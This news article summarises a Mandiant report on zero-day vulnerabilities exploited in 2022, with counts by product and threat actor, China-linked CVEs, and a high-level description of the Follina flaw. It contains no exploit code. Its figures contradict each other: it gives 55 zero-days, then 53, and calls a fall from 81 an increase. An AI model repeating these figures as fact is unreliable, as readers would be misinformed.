A new report by Mandiant throws light on the state of zero-day exploitation throughout 2022.
In 2022, 55 zero-day vulnerabilities were exploited in the wild, with the majority of the flaws being found in software from Microsoft, Google, and Apple. This number is down from the 81 zero-days weaponized the year before, but still indicates a notable increase in threat actors utilizing unknown security issues for their gain.
According to threat intelligence firm Mandiant, the most exploited products were desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six). Thirteen of the 55 zero-day bugs were used by espionage groups, and four others were used by financially motivated threat actors for ransomware-related activities.
Three of the zero-days were linked to commercial spyware vendors. China-attributed state-sponsored groups have been identified as the most active, having taken advantage of seven zero-days (CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328).
Follina Zero-Day: Largely Exploited in 2022
Mandiant has observed that numerous campaigns have utilized a vulnerability in Microsoft Diagnostics Tool (also known as Follina) to gain initial access. The vulnerability was unearthed by the nao_sec research team, following the discovery of a Word Document uploaded to VirusTotal from a Belarusian IP address. The researchers posted a series of tweets detailing their discovery. The Follina (CVE-2022-30190) vulnerability leverages Microsoft Word’s external link to load the HTML and then uses the ‘ms-msdt’ scheme to execute PowerShell code.
In 2022, Follina was weaponized by a variety of China-related espionage clusters. This suggests that the zero-day exploit was likely distributed to various Chinese espionage groups by “a digital quartermaster”, indicating the presence of a centralized coordinating entity that shares development and logistics resources.
Threat actors from North Korea and Russia have been connected to the utilization of two zero-day vulnerabilities each. These include CVE-2022-0609, CVE-2022-41128, CVE-2022-30190, and CVE-2023-23397. This revelation comes at a time when threat actors are becoming more skilled at transforming newly revealed vulnerabilities into effective exploits for attacking a wide range of targets across the globe, Mandiant pointed out.
Zero-Day Exploitation in 2022: the Conclusion
Out of the 53 zero-day vulnerabilities identified in 2022, most were used to gain either remote code execution or elevated privileges, both of which align with the primary objectives of threat actors. While information disclosure vulnerabilities may be attention-grabbing due to their potential to lead to the misuse of customer and user data, the extent of damage that can be caused by these vulnerabilities is usually limited. On the other hand, gaining elevated privileges or executing code can result in the attacker being able to move laterally through the network, leading to further damage beyond the initial point of access, the report concluded.